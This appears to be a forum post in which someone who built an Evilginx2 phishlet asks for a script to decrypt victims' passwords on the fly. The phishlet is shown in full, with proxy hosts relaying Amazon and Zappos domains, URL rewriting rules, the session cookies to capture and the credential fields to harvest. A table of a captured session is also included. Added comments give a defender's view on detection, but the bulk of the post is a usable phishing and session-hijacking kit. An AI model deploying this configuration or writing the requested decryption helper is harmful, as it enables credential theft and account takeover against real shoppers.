I created a phishlet.
I can intercept the login, password, and cookies.
However, the password is captured in an encrypted format as encryptedPwd.
I want the password to be captured in decrypted form, but I haven’t been able to do it.
I need it to be stored in plaintext format in the password field.
I spent a long time trying to find a solution, but without success.
Can you explain how I can decrypt the password on the fly and inject it into the Evilginx2 sessions?
How can this be implemented? Please write at least a sample script so I can start working from there, and explain how
id | phishlet | username | password | tokens | remote ip | time |
---|---|---|---|---|---|---|
1 | xxx | barakuda… | AYAAFF3A++y… | captured | 234.234.234.12 | 2025-05-28 09:31 |
# Evilginx2 phishlet as posted; the poster has redacted the target as xxx.com.
# proxy_hosts: each entry maps a subdomain served by the proxy (phish_sub) to
# the legitimate host it relays (orig_sub + domain), so the host layout of the
# real site reappears under one unrelated registered domain.
# Defender's view: that registered domain is the part the relay cannot make
# match. Origin-bound authenticators (FIDO2/WebAuthn) key on it, and a new
# domain requesting certificates for this set of subdomain labels is a pattern
# that certificate-transparency monitoring can surface.
min_ver: ‘3.0.0’
proxy_hosts:
-
{phish_sub: ‘www’, orig_sub: ‘www’, domain: ‘xxx.com’, session: true, is_landing: true, auto_filter: true}
-
{phish_sub: ‘auth’, orig_sub: ‘auth’, domain: ‘xxx.com’, session: true, is_landing: false, auto_filter: true}
-
{phish_sub: ‘amethyst’, orig_sub: ‘amethyst’, domain: ‘xxx.com’, session: false, is_landing: false, auto_filter: true}
-
{phish_sub: ‘amazon’, orig_sub: ‘amazon’, domain: ‘xxx.com’, session: false, is_landing: false, auto_filter: true}
-
{phish_sub: ‘aax’, orig_sub: ‘aax’, domain: ‘amazon-adsystem.com’, session: false, is_landing: false, auto_filter: true}
-
{phish_sub: ‘c’, orig_sub: ‘c’, domain: ‘amazon-adsystem.com’, session: false, is_landing: false, auto_filter: true}
-
{phish_sub: ‘config.aps’, orig_sub: ‘config.aps’, domain: ‘amazon-adsystem.com’, session: false, is_landing: false, auto_filter: true}
-
{phish_sub: ‘api-cdn’, orig_sub: ‘api-cdn’, domain: ‘amazon.com’, session: false, is_landing: false, auto_filter: true}
-
{phish_sub: ‘fls-na’, orig_sub: ‘fls-na’, domain: ‘amazon.com’, session: false, is_landing: false, auto_filter: true}
-
{phish_sub: ‘m’, orig_sub: ‘m’, domain: ‘media-amazon.com’, session: false, is_landing: false, auto_filter: true}
-
{phish_sub: ‘images-na’, orig_sub: ‘images-na’, domain: ‘ssl-images-amazon.com’, session: false, is_landing: false, auto_filter: true}
-
{phish_sub: ‘edge’, orig_sub: ‘edge’, domain: ‘flags.zappos.app’, session: false, is_landing: false, auto_filter: true}
-
{phish_sub: ‘tagging’, orig_sub: ‘tagging’, domain: ‘mkt.zappos.com’, session: false, is_landing: false, auto_filter: true}
-
{phish_sub: ‘zappos’, orig_sub: ‘www’, domain: ‘zappos.com’, session: false, is_landing: false, auto_filter: true}
# sub_filters: for responses from the host in triggers_on whose content type is
# in mimes, text matching the search regex (an absolute URL of the legitimate
# host) is replaced with https://{hostname}, presumably the proxy's own
# hostname for that entry (confirm against the Evilginx phishlet documentation).
# Defender's view: the victim's traffic reaches the real site from the relay's
# address, so server-side signals (many accounts from one hosting-provider IP,
# a session whose client fingerprint does not fit the account's history) are
# where this is detected; the rewritten pages themselves look authentic.
sub_filters:
-
{triggers_on: ‘www.xxx.com’, orig_sub: ‘www’, domain: ‘xxx.com’, search: ‘(https?:\/\/www\.xxx\.com)’, replace: ‘https://{hostname}’, mimes: [‘text/html’, ‘application/json’, ‘application/javascript’]}
-
{triggers_on: ‘auth.xxx.com’, orig_sub: ‘auth’, domain: ‘xxx.com’, search: ‘(https?:\/\/auth\.xxx\.com)’, replace: ‘https://{hostname}’, mimes: [‘text/html’, ‘application/json’, ‘application/javascript’]}
-
{triggers_on: ‘amethyst.xxx.com’, orig_sub: ‘amethyst’, domain: ‘xxx.com’, search: ‘(https?:\/\/amethyst\.xxx\.com)’, replace: ‘https://{hostname}’, mimes: [‘text/html’, ‘application/json’, ‘application/javascript’]}
-
{triggers_on: ‘amazon.xxx.com’, orig_sub: ‘amazon’, domain: ‘xxx.com’, search: ‘(https?:\/\/amazon\.xxx\.com)’, replace: ‘https://{hostname}’, mimes: [‘text/html’, ‘application/json’, ‘application/javascript’]}
-
{triggers_on: ‘aax.amazon-adsystem.com’, orig_sub: ‘aax’, domain: ‘amazon-adsystem.com’, search: ‘(https?:\/\/aax\.amazon-adsystem\.com)’, replace: ‘https://{hostname}’, mimes: [‘text/html’, ‘application/json’, ‘application/javascript’]}
-
{triggers_on: ‘c.amazon-adsystem.com’, orig_sub: ‘c’, domain: ‘amazon-adsystem.com’, search: ‘(https?:\/\/c\.amazon-adsystem\.com)’, replace: ‘https://{hostname}’, mimes: [‘text/html’, ‘application/json’, ‘application/javascript’]}
-
{triggers_on: ‘config.aps.amazon-adsystem.com’, orig_sub: ‘config.aps’, domain: ‘amazon-adsystem.com’, search: ‘(https?:\/\/config\.aps\.amazon-adsystem\.com)’, replace: ‘https://{hostname}’, mimes: [‘text/html’, ‘application/json’, ‘application/javascript’]}
-
{triggers_on: ‘api-cdn.amazon.com’, orig_sub: ‘api-cdn’, domain: ‘amazon.com’, search: ‘(https?:\/\/api-cdn\.amazon\.com)’, replace: ‘https://{hostname}’, mimes: [‘text/html’, ‘application/json’, ‘application/javascript’]}
-
{triggers_on: ‘fls-na.amazon.com’, orig_sub: ‘fls-na’, domain: ‘amazon.com’, search: ‘(https?:\/\/fls-na\.amazon\.com)’, replace: ‘https://{hostname}’, mimes: [‘text/html’, ‘application/json’, ‘application/javascript’]}
-
{triggers_on: ‘m.media-amazon.com’, orig_sub: ‘m’, domain: ‘media-amazon.com’, search: ‘(https?:\/\/m\.media-amazon\.com)’, replace: ‘https://{hostname}’, mimes: [‘text/html’, ‘application/json’, ‘application/javascript’]}
-
{triggers_on: ‘images-na.ssl-images-amazon.com’, orig_sub: ‘images-na’, domain: ‘ssl-images-amazon.com’, search: ‘(https?:\/\/images-na\.ssl-images-amazon\.com)’, replace: ‘https://{hostname}’, mimes: [‘text/html’, ‘application/json’, ‘application/javascript’]}
-
{triggers_on: ‘edge.flags.zappos.app’, orig_sub: ‘edge.flags’, domain: ‘zappos.app’, search: ‘(https?:\/\/edge\.flags\.zappos\.app)’, replace: ‘https://{hostname}’, mimes: [‘text/html’, ‘application/json’, ‘application/javascript’]}
-
{triggers_on: ‘tagging.mkt.zappos.com’, orig_sub: ‘tagging.mkt’, domain: ‘zappos.com’, search: ‘(https?:\/\/tagging\.mkt\.zappos\.com)’, replace: ‘https://{hostname}’, mimes: [‘text/html’, ‘application/json’, ‘application/javascript’]}
-
{triggers_on: ‘config.aps.amazon-adsystem.com’, orig_sub: ‘config.aps’, domain: ‘amazon-adsystem.com’, search: ‘(https?:\/\/config\.aps\.amazon-adsystem\.com)’, replace: ‘https://{hostname}’, mimes: [‘text/html’, ‘application/json’, ‘application/javascript’]}
# auth_urls / auth_tokens: the cookie names listed per cookie domain are what
# the tool records from the relayed login; the session table in the post shows
# them as "captured". auth_urls presumably marks the path whose request signals
# a completed login (confirm against the Evilginx phishlet documentation).
# Defender's view: these are post-authentication session cookies, so the
# exposure is session replay and does not depend on the password being
# readable. Controls that matter here act on the session: device- or
# token-bound sessions, short lifetimes, re-authentication for sensitive
# actions, and revocation when the session appears from a new client.
auth_urls:
- ‘/login’
auth_tokens:
- domain: ‘.xxx.com’
keys: [‘geo’, ‘clouddc’, ‘zfc’, ‘ak_bmsc’, ‘_ga’, ‘_scid’, ‘tid’, ‘ubid-main’, ‘session-id’, ‘session-id-time’, ‘x-main’, ‘at-main’, ‘sess-at-main’, ‘holmes’, ‘session-token’, ‘bm_sv’, ‘_scid_r’, ‘_ga_Z3NX31HJZE’] - domain: ‘.www.xxx.com’
keys: [‘cwr_u’, ‘cwr_s’]
# credentials: the POST fields read from the relayed login request. email is
# stored as the username; the password is taken from encryptedPwd, which per
# the post holds a value already encrypted when it is submitted (the
# "AYAAFF3A++y…" column in the session table).
# Defender's view: field-level encryption in the browser keeps the cleartext
# password out of the relay's captured form data, as the poster observes, but
# it is not a substitute for phishing-resistant authentication: the relay
# still obtains the session cookies listed under auth_tokens.
credentials:
username:
key: ‘email’
search: ‘(.)’
type: ‘post’
password:
key: ‘encryptedPwd’
search: '(.)’
type: ‘post’
# login: host and path that the phishlet names as the login page of the
# relayed site (www.xxx.com, root path).
login:
domain: ‘www.xxx.com’
path: ‘/’